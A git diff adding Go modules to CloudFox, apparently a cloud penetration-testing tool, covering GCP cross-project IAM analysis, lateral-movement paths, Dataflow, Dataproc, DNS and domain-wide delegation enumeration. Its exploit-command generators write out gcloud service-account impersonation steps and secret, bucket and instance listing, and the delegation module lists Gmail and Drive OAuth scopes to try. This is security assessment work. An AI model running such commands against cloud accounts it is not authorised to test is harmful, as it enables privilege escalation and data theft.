+ + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var crossProjectSAs []CrossProjectServiceAccount + + // Build a map of all service accounts by email -> project + saProjectMap := make(map[string]string) + allSAs := make(map[string]*CrossProjectServiceAccount) + + // List all service accounts in each project + for _, projectID := range projectIDs { + req := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)) + err := req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saProjectMap[sa.Email] = projectID + allSAs[sa.Email] = &CrossProjectServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + DisplayName: sa.DisplayName, + UniqueID: sa.UniqueId, + TargetAccess: []string{}, + } + } + return nil + }) + if err != nil { + continue // Skip on error + } + } + + // Now check each project's IAM policy for service accounts from other projects + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + sourceProject := saProjectMap[email] + + // Cross-project access + if sourceProject != "" && sourceProject != targetProject { + if sa, exists := allSAs[email]; exists { + accessDesc := fmt.Sprintf("%s: %s", targetProject, binding.Role) + sa.TargetAccess = append(sa.TargetAccess, accessDesc) + } + } + } + } + } + } + + // Collect SAs with cross-project access + for _, sa := range allSAs { + if len(sa.TargetAccess) > 0 { + crossProjectSAs = append(crossProjectSAs, *sa) + } + } + + return crossProjectSAs, nil +} + +// FindLateralMovementPaths identifies lateral movement paths between projects +func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]LateralMovementPath, error) { + ctx := context.Background() + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var paths []LateralMovementPath + + // Analyze each project pair + for _, sourceProject := range projectIDs { + for _, targetProject := range projectIDs { + if sourceProject == targetProject { + continue + } + + // Get target project IAM policy + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + // Find principals from source project that have access to target + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + memberProject := extractProjectFromMember(member) + if memberProject == sourceProject { + path := LateralMovementPath{ + SourceProject: sourceProject, + SourcePrincipal: member, + TargetProject: targetProject, + AccessMethod: "Direct IAM Role", + TargetRoles: []string{binding.Role}, + PrivilegeLevel: categorizePrivilegeLevel(binding.Role), + } + path.ExploitCommands = s.generateLateralMovementCommands(path) + paths = append(paths, path) + } + } + } + } + } + + return paths, nil +} + +// analyzeBindingRisk determines the risk level of a cross-project binding +func (s *CrossProjectService) analyzeBindingRisk(role, member string, isFromKnownProject bool) (string, []string) { + var reasons []string + score := 0 + + // High-privilege roles + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.securityAdmin": true, + "roles/compute.admin": true, + "roles/storage.admin": true, + "roles/secretmanager.admin": true, + } + + if highPrivRoles[role] { + reasons = append(reasons, fmt.Sprintf("High-privilege role: %s", role)) + score += 3 + } + + // Admin/editor roles are always concerning + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + reasons = append(reasons, "Role contains 'admin' permissions") + score += 2 + } + + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + reasons = append(reasons, "Role contains 'editor' permissions") + score += 2 + } + + // Service account cross-project is higher risk than user + if strings.HasPrefix(member, "serviceAccount:") { + reasons = append(reasons, "Service account has cross-project access (can be automated)") + score += 1 + } + + // Unknown source project is concerning + if !isFromKnownProject { + reasons = append(reasons, "Access from project outside analyzed scope") + score += 1 + } + + if score >= 4 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// generateExploitCommands generates exploitation commands for a cross-project binding +func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBinding) []string { + var commands []string + + if binding.PrincipalType == "serviceAccount" { + email := strings.TrimPrefix(binding.Principal, "serviceAccount:") + + commands = append(commands, + fmt.Sprintf("# Impersonate SA from %s to access %s:", binding.SourceProject, binding.TargetProject), + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), + fmt.Sprintf("# Then use token to access target project:"), + fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", binding.TargetProject, email), + ) + } + + // Role-specific exploitation + if strings.Contains(binding.Role, "storage") { + commands = append(commands, + fmt.Sprintf("# List buckets in target project:"), + fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), + ) + } + + if strings.Contains(binding.Role, "compute") { + commands = append(commands, + fmt.Sprintf("# List instances in target project:"), + fmt.Sprintf("gcloud compute instances list --project=%s", binding.TargetProject), + ) + } + + if strings.Contains(binding.Role, "secretmanager") { + commands = append(commands, + fmt.Sprintf("# List secrets in target project:"), + fmt.Sprintf("gcloud secrets list --project=%s", binding.TargetProject), + ) + } + + return commands +} + +// generateLateralMovementCommands generates commands for lateral movement +func (s *CrossProjectService) generateLateralMovementCommands(path LateralMovementPath) []string { + var commands []string + + if strings.HasPrefix(path.SourcePrincipal, "serviceAccount:") { + email := strings.TrimPrefix(path.SourcePrincipal, "serviceAccount:") + + commands = append(commands, + fmt.Sprintf("# Lateral movement from %s to %s via SA impersonation:", path.SourceProject, path.TargetProject), + fmt.Sprintf("# 1. Get access token for the cross-project SA:"), + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), + fmt.Sprintf("# 2. Use the SA to access target project:"), + ) + + // Add role-specific commands + for _, role := range path.TargetRoles { + if strings.Contains(role, "owner") || strings.Contains(role, "editor") { + commands = append(commands, + fmt.Sprintf("# Full project access with %s:", role), + fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", path.TargetProject, email), + ) + } + } + } + + return commands +} + +// extractProjectFromMember extracts the project ID from a member string +func extractProjectFromMember(member string) string { + // serviceAccount:sa-name@project-id.iam.gserviceaccount.com + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + // Format: name@project-id.iam.gserviceaccount.com + // or: project-id@project-id.iam.gserviceaccount.com + if strings.Contains(email, ".iam.gserviceaccount.com") { + parts := strings.Split(email, "@") + if len(parts) == 2 { + domain := parts[1] + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + } + // App Engine default service accounts + if strings.Contains(email, "@appspot.gserviceaccount.com") { + parts := strings.Split(email, "@") + if len(parts) == 2 { + return strings.TrimSuffix(parts[1], ".appspot.gserviceaccount.com") + } + } + // Compute Engine default service accounts: project-number@project.iam.gserviceaccount.com + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // Can't extract project ID from project number easily + return "" + } + } + return "" +} + +// extractPrincipalType extracts the type of principal from a member string +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +// categorizePrivilegeLevel categorizes the privilege level of a role +func categorizePrivilegeLevel(role string) string { + if strings.Contains(role, "owner") || strings.Contains(role, "Owner") { + return "ADMIN" + } + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + return "ADMIN" + } + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + return "WRITE" + } + if strings.Contains(role, "writer") || strings.Contains(role, "Writer") { + return "WRITE" + } + if strings.Contains(role, "creator") || strings.Contains(role, "Creator") { + return "WRITE" + } + if strings.Contains(role, "viewer") || strings.Contains(role, "Viewer") { + return "READ" + } + if strings.Contains(role, "reader") || strings.Contains(role, "Reader") { + return "READ" + } + return "READ" // Default to READ for unknown +} diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go new file mode 100644 index 00000000..c7788210 --- /dev/null +++ b/gcp/services/dataflowService/dataflowService.go @@ -0,0 +1,177 @@ +package dataflowservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dataflow "google.golang.org/api/dataflow/v1b3" +) + +type DataflowService struct { + session *gcpinternal.SafeSession +} + +func New() *DataflowService { + return &DataflowService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataflowService { + return &DataflowService{session: session} +} + +// JobInfo represents a Dataflow job +type JobInfo struct { + ID string `json:"id"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // JOB_TYPE_BATCH or JOB_TYPE_STREAMING + State string `json:"state"` // JOB_STATE_RUNNING, etc. + CreateTime string `json:"createTime"` + CurrentStateTime string `json:"currentStateTime"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + TempLocation string `json:"tempLocation"` // GCS temp location + StagingLocation string `json:"stagingLocation"` // GCS staging location + WorkerRegion string `json:"workerRegion"` + WorkerZone string `json:"workerZone"` + NumWorkers int64 `json:"numWorkers"` + MachineType string `json:"machineType"` + UsePublicIPs bool `json:"usePublicIps"` + EnableStreamingEngine bool `json:"enableStreamingEngine"` + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// TemplateInfo represents a Dataflow template +type TemplateInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + // Template metadata +} + +// ListJobs retrieves all Dataflow jobs in a project +func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + var service *dataflow.Service + var err error + + if s.session != nil { + service, err = dataflow.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataflow.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + req := service.Projects.Jobs.Aggregated(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + info := s.parseJob(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + return jobs, nil +} + +// parseJob converts a Dataflow job to JobInfo +func (s *DataflowService) parseJob(job *dataflow.Job, projectID string) JobInfo { + info := JobInfo{ + ID: job.Id, + Name: job.Name, + ProjectID: projectID, + Location: job.Location, + Type: job.Type, + State: job.CurrentState, + CreateTime: job.CreateTime, + CurrentStateTime: job.CurrentStateTime, + RiskReasons: []string{}, + } + + // Parse environment settings + if job.Environment != nil { + info.ServiceAccount = job.Environment.ServiceAccountEmail + info.TempLocation = job.Environment.TempStoragePrefix + info.WorkerRegion = job.Environment.WorkerRegion + info.WorkerZone = job.Environment.WorkerZone + + // Check worker pools for network config + if len(job.Environment.WorkerPools) > 0 { + wp := job.Environment.WorkerPools[0] + info.Network = wp.Network + info.Subnetwork = wp.Subnetwork + info.NumWorkers = wp.NumWorkers + info.MachineType = wp.MachineType + + // Check for public IPs - default is true if not specified + if wp.IpConfiguration == "WORKER_IP_PRIVATE" { + info.UsePublicIPs = false + } else { + info.UsePublicIPs = true + } + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeJobRisk(info) + + return info +} + +// analyzeJobRisk determines the risk level of a Dataflow job +func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IPs increase exposure + if job.UsePublicIPs { + reasons = append(reasons, "Workers use public IP addresses") + score += 2 + } + + // Default service account is often over-privileged + if job.ServiceAccount == "" || strings.Contains(job.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // Check for external temp/staging locations + if job.TempLocation != "" && !strings.Contains(job.TempLocation, projectID(job.ProjectID)) { + reasons = append(reasons, "Temp location may be in external project") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func projectID(id string) string { + return id +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go new file mode 100644 index 00000000..13005b0a --- /dev/null +++ b/gcp/services/dataprocService/dataprocService.go @@ -0,0 +1,303 @@ +package dataprocservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dataproc "google.golang.org/api/dataproc/v1" +) + +type DataprocService struct { + session *gcpinternal.SafeSession +} + +func New() *DataprocService { + return &DataprocService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataprocService { + return &DataprocService{session: session} +} + +// ClusterInfo represents a Dataproc cluster +type ClusterInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + State string `json:"state"` + StateStartTime string `json:"stateStartTime"` + ClusterUUID string `json:"clusterUuid"` + + // Config + ConfigBucket string `json:"configBucket"` + TempBucket string `json:"tempBucket"` + ImageVersion string `json:"imageVersion"` + ServiceAccount string `json:"serviceAccount"` + + // Master config + MasterMachineType string `json:"masterMachineType"` + MasterCount int64 `json:"masterCount"` + MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + MasterInstanceNames []string `json:"masterInstanceNames"` + + // Worker config + WorkerMachineType string `json:"workerMachineType"` + WorkerCount int64 `json:"workerCount"` + WorkerDiskSizeGB int64 `json:"workerDiskSizeGb"` + + // Network config + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + InternalIPOnly bool `json:"internalIpOnly"` + Zone string `json:"zone"` + + // Security config + KerberosEnabled bool `json:"kerberosEnabled"` + SecureBoot bool `json:"secureBoot"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// JobInfo represents a Dataproc job +type JobInfo struct { + JobID string `json:"jobId"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + ClusterName string `json:"clusterName"` + Status string `json:"status"` + JobType string `json:"jobType"` + SubmittedBy string `json:"submittedBy"` + StartTime string `json:"startTime"` + EndTime string `json:"endTime"` +} + +// Common GCP regions for Dataproc +var dataprocRegions = []string{ + "us-central1", "us-east1", "us-east4", "us-west1", "us-west2", "us-west3", "us-west4", + "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", + "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", + "asia-south1", "asia-southeast1", "asia-southeast2", + "australia-southeast1", "southamerica-east1", "northamerica-northeast1", +} + +// ListClusters retrieves all Dataproc clusters +func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { + ctx := context.Background() + var service *dataproc.Service + var err error + + if s.session != nil { + service, err = dataproc.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataproc.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var clusters []ClusterInfo + + // List across common regions + for _, region := range dataprocRegions { + regionClusters, err := service.Projects.Regions.Clusters.List(projectID, region).Context(ctx).Do() + if err != nil { + continue // Skip regions with errors (API not enabled, no permissions, etc.) + } + + for _, cluster := range regionClusters.Clusters { + info := s.parseCluster(cluster, projectID, region, service, ctx) + clusters = append(clusters, info) + } + } + + return clusters, nil +} + +// ListJobs retrieves recent Dataproc jobs +func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) { + ctx := context.Background() + var service *dataproc.Service + var err error + + if s.session != nil { + service, err = dataproc.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = dataproc.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var jobs []JobInfo + + resp, err := service.Projects.Regions.Jobs.List(projectID, region).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + for _, job := range resp.Jobs { + info := s.parseJob(job, projectID, region) + jobs = append(jobs, info) + } + + return jobs, nil +} + +func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string, service *dataproc.Service, ctx context.Context) ClusterInfo { + info := ClusterInfo{ + Name: cluster.ClusterName, + ProjectID: projectID, + Region: region, + ClusterUUID: cluster.ClusterUuid, + IAMBindings: []IAMBinding{}, + } + + if cluster.Status != nil { + info.State = cluster.Status.State + info.StateStartTime = cluster.Status.StateStartTime + } + + if cluster.Config != nil { + info.ConfigBucket = cluster.Config.ConfigBucket + info.TempBucket = cluster.Config.TempBucket + + // Software config + if cluster.Config.SoftwareConfig != nil { + info.ImageVersion = cluster.Config.SoftwareConfig.ImageVersion + } + + // GCE cluster config + if cluster.Config.GceClusterConfig != nil { + gcc := cluster.Config.GceClusterConfig + info.ServiceAccount = gcc.ServiceAccount + info.Network = extractName(gcc.NetworkUri) + info.Subnetwork = extractName(gcc.SubnetworkUri) + info.InternalIPOnly = gcc.InternalIpOnly + info.Zone = extractName(gcc.ZoneUri) + + if gcc.ShieldedInstanceConfig != nil { + info.SecureBoot = gcc.ShieldedInstanceConfig.EnableSecureBoot + } + } + + // Master config + if cluster.Config.MasterConfig != nil { + mc := cluster.Config.MasterConfig + info.MasterMachineType = extractName(mc.MachineTypeUri) + info.MasterCount = mc.NumInstances + info.MasterInstanceNames = mc.InstanceNames + if mc.DiskConfig != nil { + info.MasterDiskSizeGB = mc.DiskConfig.BootDiskSizeGb + } + } + + // Worker config + if cluster.Config.WorkerConfig != nil { + wc := cluster.Config.WorkerConfig + info.WorkerMachineType = extractName(wc.MachineTypeUri) + info.WorkerCount = wc.NumInstances + if wc.DiskConfig != nil { + info.WorkerDiskSizeGB = wc.DiskConfig.BootDiskSizeGb + } + } + + // Security config + if cluster.Config.SecurityConfig != nil && cluster.Config.SecurityConfig.KerberosConfig != nil { + info.KerberosEnabled = true + } + } + + // Get IAM policy for the cluster + info.IAMBindings = s.getClusterIAMBindings(service, ctx, projectID, region, cluster.ClusterName) + + return info +} + +func (s *DataprocService) parseJob(job *dataproc.Job, projectID, region string) JobInfo { + info := JobInfo{ + JobID: job.Reference.JobId, + ProjectID: projectID, + Region: region, + ClusterName: job.Placement.ClusterName, + } + + if job.Status != nil { + info.Status = job.Status.State + info.StartTime = job.Status.StateStartTime + } + + if job.StatusHistory != nil && len(job.StatusHistory) > 0 { + for _, status := range job.StatusHistory { + if status.State == "DONE" || status.State == "ERROR" || status.State == "CANCELLED" { + info.EndTime = status.StateStartTime + break + } + } + } + + // Determine job type + if job.HadoopJob != nil { + info.JobType = "Hadoop" + } else if job.SparkJob != nil { + info.JobType = "Spark" + } else if job.PysparkJob != nil { + info.JobType = "PySpark" + } else if job.HiveJob != nil { + info.JobType = "Hive" + } else if job.PigJob != nil { + info.JobType = "Pig" + } else if job.SparkRJob != nil { + info.JobType = "SparkR" + } else if job.SparkSqlJob != nil { + info.JobType = "SparkSQL" + } else if job.PrestoJob != nil { + info.JobType = "Presto" + } else { + info.JobType = "Unknown" + } + + return info +} + +// getClusterIAMBindings retrieves IAM bindings for a Dataproc cluster +func (s *DataprocService) getClusterIAMBindings(service *dataproc.Service, ctx context.Context, projectID, region, clusterName string) []IAMBinding { + var bindings []IAMBinding + + resource := fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, region, clusterName) + policy, err := service.Projects.Regions.Clusters.GetIamPolicy(resource, &dataproc.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullPath string) string { + if fullPath == "" { + return "" + } + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go new file mode 100644 index 00000000..ae898fe2 --- /dev/null +++ b/gcp/services/dnsService/dnsService.go @@ -0,0 +1,208 @@ +package dnsservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + dns "google.golang.org/api/dns/v1" +) + +type DNSService struct{} + +func New() *DNSService { + return &DNSService{} +} + +// ZoneInfo holds Cloud DNS managed zone details +type ZoneInfo struct { + Name string + ProjectID string + DNSName string // The DNS name (e.g., example.com.) + Description string + Visibility string // public or private + CreationTime string + + // DNSSEC configuration + DNSSECState string // on, off, transfer + DNSSECKeyType string + + // Private zone configuration + PrivateNetworks []string // VPC networks for private zones + + // Peering configuration + PeeringNetwork string + PeeringTargetProject string + + // Forwarding configuration + ForwardingTargets []string + + // Record count + RecordCount int64 + + // IAM bindings + IAMBindings []IAMBinding +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// RecordInfo holds DNS record details +type RecordInfo struct { + Name string + ProjectID string + ZoneName string + Type string // A, AAAA, CNAME, MX, TXT, etc. + TTL int64 + RRDatas []string // Record data +} + +// Zones retrieves all DNS managed zones in a project +func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { + ctx := context.Background() + + service, err := dns.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var zones []ZoneInfo + + call := service.ManagedZones.List(projectID) + err = call.Pages(ctx, func(page *dns.ManagedZonesListResponse) error { + for _, zone := range page.ManagedZones { + info := parseZoneInfo(zone, projectID) + // Get IAM bindings for the zone + info.IAMBindings = ds.getZoneIAMBindings(service, ctx, projectID, zone.Name) + zones = append(zones, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return zones, nil +} + +// Records retrieves all DNS records in a zone +func (ds *DNSService) Records(projectID, zoneName string) ([]RecordInfo, error) { + ctx := context.Background() + + service, err := dns.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + var records []RecordInfo + + call := service.ResourceRecordSets.List(projectID, zoneName) + err = call.Pages(ctx, func(page *dns.ResourceRecordSetsListResponse) error { + for _, rrset := range page.Rrsets { + info := RecordInfo{ + Name: rrset.Name, + ProjectID: projectID, + ZoneName: zoneName, + Type: rrset.Type, + TTL: rrset.Ttl, + RRDatas: rrset.Rrdatas, + } + records = append(records, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dns.googleapis.com") + } + + return records, nil +} + +// parseZoneInfo extracts relevant information from a DNS managed zone +func parseZoneInfo(zone *dns.ManagedZone, projectID string) ZoneInfo { + info := ZoneInfo{ + Name: zone.Name, + ProjectID: projectID, + DNSName: zone.DnsName, + Description: zone.Description, + Visibility: zone.Visibility, + CreationTime: zone.CreationTime, + } + + // DNSSEC configuration + if zone.DnssecConfig != nil { + info.DNSSECState = zone.DnssecConfig.State + if len(zone.DnssecConfig.DefaultKeySpecs) > 0 { + info.DNSSECKeyType = zone.DnssecConfig.DefaultKeySpecs[0].Algorithm + } + } + + // Private zone configuration + if zone.PrivateVisibilityConfig != nil { + for _, network := range zone.PrivateVisibilityConfig.Networks { + info.PrivateNetworks = append(info.PrivateNetworks, extractNetworkName(network.NetworkUrl)) + } + } + + // Peering configuration + if zone.PeeringConfig != nil && zone.PeeringConfig.TargetNetwork != nil { + info.PeeringNetwork = extractNetworkName(zone.PeeringConfig.TargetNetwork.NetworkUrl) + // Extract project from network URL + if strings.Contains(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/projects/") { + parts := strings.Split(zone.PeeringConfig.TargetNetwork.NetworkUrl, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + info.PeeringTargetProject = parts[i+1] + break + } + } + } + } + + // Forwarding configuration + if zone.ForwardingConfig != nil { + for _, target := range zone.ForwardingConfig.TargetNameServers { + info.ForwardingTargets = append(info.ForwardingTargets, target.Ipv4Address) + } + } + + return info +} + +// extractNetworkName extracts the network name from a network URL +func extractNetworkName(networkURL string) string { + // Format: https://www.googleapis.com/compute/v1/projects/PROJECT/global/networks/NETWORK + parts := strings.Split(networkURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return networkURL +} + +// getZoneIAMBindings retrieves IAM bindings for a DNS managed zone +func (ds *DNSService) getZoneIAMBindings(service *dns.Service, ctx context.Context, projectID, zoneName string) []IAMBinding { + var bindings []IAMBinding + + resource := "projects/" + projectID + "/managedZones/" + zoneName + policy, err := service.ManagedZones.GetIamPolicy(resource, &dns.GoogleIamV1GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go new file mode 100644 index 00000000..7d7b8662 --- /dev/null +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -0,0 +1,247 @@ +package domainwidedelegationservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iam "google.golang.org/api/iam/v1" +) + +type DomainWideDelegationService struct{} + +func New() *DomainWideDelegationService { + return &DomainWideDelegationService{} +} + +// DWDServiceAccount represents a service account with domain-wide delegation +type DWDServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + OAuth2ClientID string `json:"oauth2ClientId"` + DWDEnabled bool `json:"dwdEnabled"` + Keys []KeyInfo `json:"keys"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try +} + +// KeyInfo represents a service account key +type KeyInfo struct { + KeyID string `json:"keyId"` + CreatedAt string `json:"createdAt"` + ExpiresAt string `json:"expiresAt"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyType string `json:"keyType"` +} + +// Common Google Workspace OAuth scopes that DWD service accounts might have +var CommonWorkspaceScopes = []string{ + "https://www.googleapis.com/auth/gmail.readonly", + "https://www.googleapis.com/auth/gmail.send", + "https://www.googleapis.com/auth/gmail.modify", + "https://www.googleapis.com/auth/drive", + "https://www.googleapis.com/auth/drive.readonly", + "https://www.googleapis.com/auth/calendar", + "https://www.googleapis.com/auth/calendar.readonly", + "https://www.googleapis.com/auth/admin.directory.user.readonly", + "https://www.googleapis.com/auth/admin.directory.group.readonly", + "https://www.googleapis.com/auth/spreadsheets", + "https://www.googleapis.com/auth/contacts.readonly", + "https://mail.google.com/", +} + +// GetDWDServiceAccounts finds service accounts that may have domain-wide delegation +func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([]DWDServiceAccount, error) { + ctx := context.Background() + service, err := iam.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var dwdAccounts []DWDServiceAccount + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.ServiceAccounts.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + for _, sa := range resp.Accounts { + // Check if the service account has an OAuth2 client ID (required for DWD) + // The OAuth2ClientId field is populated when DWD is enabled + dwdEnabled := sa.Oauth2ClientId != "" + + account := DWDServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + OAuth2ClientID: sa.Oauth2ClientId, + DWDEnabled: dwdEnabled, + Description: sa.Description, + Keys: []KeyInfo{}, + RiskReasons: []string{}, + ExploitCommands: []string{}, + WorkspaceScopes: CommonWorkspaceScopes, + } + + // Check for keys + keysResp, err := service.Projects.ServiceAccounts.Keys.List( + fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email), + ).Context(ctx).Do() + if err == nil { + // Collect user-managed keys (not system-managed) + for _, key := range keysResp.Keys { + if key.KeyType == "USER_MANAGED" { + // Extract key ID from full name (projects/.../keys/KEY_ID) + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + account.Keys = append(account.Keys, KeyInfo{ + KeyID: keyID, + CreatedAt: key.ValidAfterTime, + ExpiresAt: key.ValidBeforeTime, + KeyAlgorithm: key.KeyAlgorithm, + KeyType: key.KeyType, + }) + } + } + } + + // Analyze risk + account.RiskLevel, account.RiskReasons = s.analyzeRisk(account) + + // Generate exploit commands + account.ExploitCommands = s.generateExploitCommands(account) + + // Only include accounts with DWD or that look like they might be used for it + if dwdEnabled || s.looksLikeDWDAccount(account) { + dwdAccounts = append(dwdAccounts, account) + } + } + + return dwdAccounts, nil +} + +// looksLikeDWDAccount checks if a service account might be used for DWD based on naming +func (s *DomainWideDelegationService) looksLikeDWDAccount(account DWDServiceAccount) bool { + emailLower := strings.ToLower(account.Email) + descLower := strings.ToLower(account.Description) + nameLower := strings.ToLower(account.DisplayName) + + // Common naming patterns for DWD service accounts + dwdPatterns := []string{ + "delegation", "dwd", "workspace", 